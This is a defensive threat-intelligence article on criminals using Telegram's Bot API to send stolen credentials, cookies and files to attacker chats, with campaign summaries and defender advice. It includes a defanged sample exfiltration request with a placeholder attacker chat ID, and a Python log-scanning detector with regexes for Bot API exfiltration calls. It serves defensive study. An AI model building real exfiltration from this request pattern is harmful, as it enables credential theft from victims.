Telegram is the world’s most abused legitimate communications platform for cybercrime. What began as an end-to-end encrypted messaging app for privacy-conscious users has been systematically weaponized by threat actors — using its own developer API to funnel stolen credentials, browser cookies, screenshots, and entire identity profiles directly into attacker-controlled chat rooms, in real time, with no specialized infrastructure required.

The mechanics are disarmingly simple. Telegram’s Bot API allows any developer to create automated accounts that can send messages, upload files up to 50 MB, and receive commands — all over standard HTTPS. For cybercriminals, this means data exfiltration that blends seamlessly into legitimate web traffic, is difficult to block without disrupting normal usage, and requires nothing more than a free Telegram account to set up.

The Scale of the Problem

Research published by Bitsight’s TRACE team offers a sobering snapshot of the ecosystem. Beginning data collection in October 2024 and monitoring approximately 1,800 Telegram bots, researchers observed over five million victim logs — containing IP addresses, domain names, and credentials — with timestamps reaching back to 2020 but concentrated heavily from 2022 onward. Bitsight 2024

Industry-wide campaign tracking reinforces the trend. According to analysis by Security Boulevard covering Q1 2024 through Q2 2025, 3.8% of all malware-based Active Threat Reports (ATRs) designated Telegram as a command-and-control (C2) server, while 2.3% of all credential phishing ATRs did the same. Security Boulevard 2026

Telegram’s encrypted messaging, real-time communication, and ability to send large data files make it an ideal platform for cybercriminal activities — it has emerged as both a data exfiltration server and a marketplace for victim credentials.

— Bitsight TRACE Research Team

By early 2026, the scope had expanded dramatically. An analysis by the cryptocurrency tracing firm Elliptic, reported by WebProNews, estimated that Chinese-speaking criminal networks alone were processing $2 billion per month in illicit Telegram-based transactions — representing a 150% increase in transaction volumes since mid-2025. WebProNews Jan 2026

How the Attack Works

Threat actors exploit Telegram bots across multiple distinct attack vectors, each suited to different targets and levels of technical sophistication.


Credential Phishing

Fake login pages submit form data directly to a Telegram bot via the sendMessage API — no server required. Credentials arrive in the attacker’s chat room seconds after the victim types them.


Keyloggers & Infostealers

Malware harvests browser passwords, cookies, session tokens, and clipboard data, then uploads compressed archives via sendDocument — the attacker’s inbox fills automatically.


Remote Access Trojans

RATs use Telegram as their C2 channel — receiving scripted payloads from bot-managed group chats and reporting victim system information, including IP address, geolocation, and browser fingerprint.


Multi-Stage Payload Delivery

Some malware uses a bot’s own Telegram profile page to embed a second-stage payload URL, reducing the footprint of malicious infrastructure and evading blocklists.

Recent Campaigns & Malware Families

The threat is not theoretical. Multiple malware families documented by major security vendors in 2025 and early 2026 rely on Telegram as their primary exfiltration channel.

April – May 2025

PupkinStealer (.NET)

First observed in the wild in April 2025, this .NET infostealer runs five parallel asynchronous tasks on execution — harvesting Chrome, Edge, and other browser credentials simultaneously with Telegram and Discord session tokens, desktop files, and screenshots. All data is bundled into a ZIP archive and uploaded to an attacker-controlled Telegram bot in a single POST request. Picus Security May 2025

October 2025

Raven Stealer

Documented by Silobreaker, Raven Stealer harvests credentials, cookies, payment details, and browser data in real time, pushing them through Telegram. Notably, the malware was distributed via GitHub and promoted on its own Telegram channel — using the platform for both distribution and exfiltration. Silobreaker Oct 2025

May 2025

Advanced Phishing Kit Campaign

Documented by KnowBe4 Threat Lab, this campaign used dynamically branded phishing websites impersonating victims’ employers, combined with rapid domain rotation to defeat blocklists. Harvested credentials were transmitted in real time to attacker-controlled Telegram bots using configurable tokens and chat IDs — enabling account takeover within seconds of submission. KnowBe4 May 2025

Inside a Telegram C2 Request

The technical simplicity of Telegram-based exfiltration is what makes it so pervasive. A RAT reporting initial victim data to an attacker’s bot looks like this — a single HTTPS POST to Telegram’s own servers:

    # POST to Telegram Bot API — sendMessage endpoint
    POST hxxps[://]api[.]telegram[.]org/bot[TOKEN]/sendMessage
    {
      "chat_id": "[ATTACKER_CHAT_ID]",
      "text": "Your file was downloaded from — Email: [REDACTED] IP Address: [REDACTED] Region: [REDACTED] City: [REDACTED] Country: United States User-Agent: [REDACTED]"
    }

    # Response confirms delivery to attacker's private chat room
    "ok": true, "message_id": 667

File exfiltration uses the sendDocument endpoint identically, uploading archives up to 50 MB — more than sufficient to contain thousands of scraped credentials, session cookies, and screenshots from a single compromised machine.

A Platform Responding — Slowly

Telegram’s posture toward law enforcement changed significantly in September 2024, when CEO Pavel Durov was arrested in France and subsequently released. The platform began cooperating with authorities, disclosing user identities behind illegal content including malware and phishing infrastructure.

The effect on criminal usage has been measurable. According to Netcraft’s 2025 research, the number of phishing sites using Telegram to transmit stolen data dropped sharply following Durov’s arrest and the platform’s increased enforcement activity. Netcraft Sep 2025 Monthly takedown figures since October 2024 have consistently exceeded the peak levels seen throughout all of 2023. Kaspersky Dec 2025

Yet the criminal ecosystem has adapted rather than collapsed. Netcraft observed threat actors pivoting to API-based email platforms such as EmailJS, and exploring Signal as an alternative — its end-to-end encryption makes platform-level moderation structurally impossible. Meanwhile, at the higher end of the market, Elliptic’s analysis shows high-value activities (zero-day trading, large-scale fraud) migrating back to reputation-gated dark-web forums where Telegram takedowns cannot reach them.

Current Threat Status

Despite Telegram’s increased cooperation with law enforcement, threat actors continue to actively exploit Telegram bots for credential theft and malware distribution as of March 2026. Organizations that do not legitimately use the Telegram Bot API should treat outbound connections to api.telegram.org/bot* as a high-confidence indicator of compromise.

What Defenders Should Do

The following measures are recommended by multiple security vendors and are consistent with current threat intelligence as of Q1 2026:

  • Block Telegram Bot API endpoints at the network perimeter. All Telegram bot traffic routes through api.telegram.org/bot{token}/METHOD_NAME. If your organization does not use Telegram bots legitimately, a blanket block on this endpoint will cut off a broad class of exfiltration malware, phishing kits, and RATs simultaneously.
  • Train staff to recognize phishing email patterns. Current campaigns use security-themed lures — unauthorized access alerts, settings updates — to create urgency. Employees should be taught to verify such messages through official channels before clicking any embedded link.
  • Monitor for outbound HTTPS POST requests to api.telegram.org. This traffic is unusual for most enterprise environments. Alert rules scoped to this domain will surface infections by keyloggers, infostealers, and RATs that use Telegram as C2.
  • Audit browser credential storage and session tokens. Modern infostealers like PupkinStealer complete their harvest in seconds. Organizations should evaluate whether browser-saved passwords represent an acceptable risk, and consider credential management policies accordingly.
  • Monitor underground channels for leaked organizational credentials. Given the scale of infostealer log marketplaces on Telegram and dark web shops, continuous monitoring for employee credentials appearing in breach data is now a standard defensive practice recommended by Kaspersky, Bitsight, and others.
  • Deploy AI-augmented email security. Traditional signature-based detection is increasingly ineffective against credential phishing kits that use rapid domain rotation and dynamically branded pages. Integrated cloud email security solutions with behavioral analysis now represent the recommended baseline.
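As an added defensive example (not code from the article or any vendor it cites), the monitoring recommendation above and the request shape shown in "Inside a Telegram C2 Request" turned into a small Python detector that scans proxy log lines for the api.telegram.org/bot{token}/METHOD_NAME pattern, keeps only the numeric bot id, and rates each hit by method. The log layout, the allowlist parameter and the method-to-severity mapping are assumptions; the sample lines and token secret are constructed.

```python
import re
from dataclasses import dataclass

# Bot API calls all take the form api.telegram.org/bot<token>/<method>; the
# token is <numeric bot id>:<secret>. Only the numeric id is kept in findings.
BOT_API_RE = re.compile(
    r"api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)"
)
# Without TLS inspection a proxy only sees the CONNECT to the host, not the path.
CONNECT_RE = re.compile(r"\bCONNECT api\.telegram\.org(?::443)?\b")

EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}  # data leaves here
POLL_METHODS = {"getUpdates"}                                 # C2 tasking / beaconing

@dataclass(frozen=True)
class Finding:
    src_ip: str
    bot_id: str     # "?" when only the CONNECT was visible
    method: str     # "?" when only the CONNECT was visible
    severity: str

def scan_proxy_log(lines, allowlisted_bot_ids=frozenset()):
    """Assumed log layout: '<timestamp> <src_ip> <verb> <url-or-host> <status>'."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        src_ip = fields[1]
        m = BOT_API_RE.search(line)
        if m:
            bot_id, method = m.group("bot_id"), m.group("method")
            if bot_id in allowlisted_bot_ids:
                severity = "info"      # a bot the organization runs on purpose
            elif method in EXFIL_METHODS:
                severity = "high"
            elif method in POLL_METHODS:
                severity = "medium"
            else:
                severity = "low"
            findings.append(Finding(src_ip, bot_id, method, severity))
        elif CONNECT_RE.search(line):
            # Host-only visibility: still worth an alert in a bot-free estate.
            findings.append(Finding(src_ip, "?", "?", "medium"))
    return findings

# Constructed sample lines; the token secret is a placeholder, not a real one.
FAKE_SECRET = "A" * 35
SAMPLE_LOG = [
    f"2026-03-02T10:14:03Z 10.0.5.21 POST https://api.telegram.org/bot123456789:{FAKE_SECRET}/sendDocument 200",
    f"2026-03-02T10:14:09Z 10.0.5.21 GET https://api.telegram.org/bot123456789:{FAKE_SECRET}/getUpdates 200",
    f"2026-03-02T10:15:40Z 10.0.7.8 POST https://api.telegram.org/bot555:{FAKE_SECRET}/sendMessage 200",
    "2026-03-02T10:16:02Z 10.0.9.3 CONNECT api.telegram.org:443 200",
    "2026-03-02T10:16:05Z 10.0.9.3 GET https://example.com/index.html 200",
]

if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_LOG, allowlisted_bot_ids={"555"}):
        print(f"{f.severity:6} {f.src_ip:10} bot={f.bot_id} method={f.method}")
```

Run against the constructed log, the sendDocument upload from 10.0.5.21 rates high, its getUpdates poll medium, the allowlisted bot 555 info, and the host-only CONNECT from 10.0.9.3 medium.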

✦ ✦ ✦

This article synthesizes findings from multiple security research sources including Bitsight TRACE, Picus Security, KnowBe4 Threat Lab, Netcraft, Kaspersky Digital Footprint Intelligence, Silobreaker, Security Boulevard, Flare, and WebProNews. All bot tokens and IP addresses referenced in technical examples have been obfuscated in accordance with responsible disclosure standards. This article is intended for security awareness and defensive purposes only.